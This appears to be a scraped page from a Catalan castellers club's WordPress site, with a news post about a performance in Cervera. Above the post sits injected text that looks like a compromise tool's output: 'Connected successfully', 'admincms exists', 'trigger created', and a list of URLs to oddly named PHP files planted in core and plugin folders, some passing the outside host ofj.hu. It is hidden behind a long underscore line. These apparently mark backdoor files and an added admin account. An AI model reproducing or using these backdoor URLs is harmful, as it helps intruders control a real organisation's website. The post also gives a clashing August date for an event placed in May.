Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?stream https://castellersdeberga.cat/wp-admin/user/index-cron-private-ajax-ajax-response-ajax-wp-meta-ajax-response.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/options-permalink-private-meta-stream-stream-ajax-ajax-response-stream.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-core-upgrader-stream-stream-wp.php https://castellersdeberga.cat/wp-content/plugins/the-events-calendar/the-events-calendar-meta-stream-stream-ajax-meta-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-private-private-cron-ajax-private-ajax-response-ajax-response-private-ajax-wp-private-stream.php https://castellersdeberga.cat/wp-includes/feed-rss2-ajax-response-core-wp-core-wp-ajax-response.php https://castellersdeberga.cat/wp-includes/theme-compat/sidebar-ajax-response-core-meta-ajax-meta.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Actuació a Cervera
 

Actuació a Cervera


Actuació a CerveraEls Castellers de Berga vam actuar, dissabte 7 de maig, per primera vegada a Cervera. Va ser dins l’entorn de la Fira de Sant Isidre i acompanyats pels amfitrions Margeners de Guissona i els Castellers d’Andorra (amb qui actuàvem també per primer cop.
L’actuació va ser força tranquil.la pels Castellers de Berga, enmig d’un maig carregat de diades i activitats. La setmana vinent actuem a la Festa Major de Puig-reig i el 21 de maig arriba la Diada dels Quatre Fuets. A Cervera hi vam descarregar un 4 de 6, 2 de 6, 3 de 6 amb agulla i pilar de 5. Els castells van servir per fer moltes rotacions als pisos i estrenar canalla als poms de dalt, pensant en el futur. Els Castellers d’Andorra van descarregar el 2 de 6 com a millor castell i els Margeners de Guissona van carregar el 4 de 7. Després de la diada, les tres colles vam anar fins a Guissona on la colla local va preparar sopar per uns 200 castellers.
Diumenge 15 d’agost actuem a la Festa Major de Puig-reig, a les 12 a la Plaça Nova, juntament amb els Castellers de Cerdanyola. El dissabte 21 de maig, a les 5 de la tarda a la Plaça de Sant Pere, arriba una de les actuacions més importants de l’any: la Diada dels Quatre Fuets.

Divendres 6 de maig, el Casal d’Europa, en el marc del Dia d’Europa, va fer un petit reconeixement als Castellers de Berga per la seva internacionalització.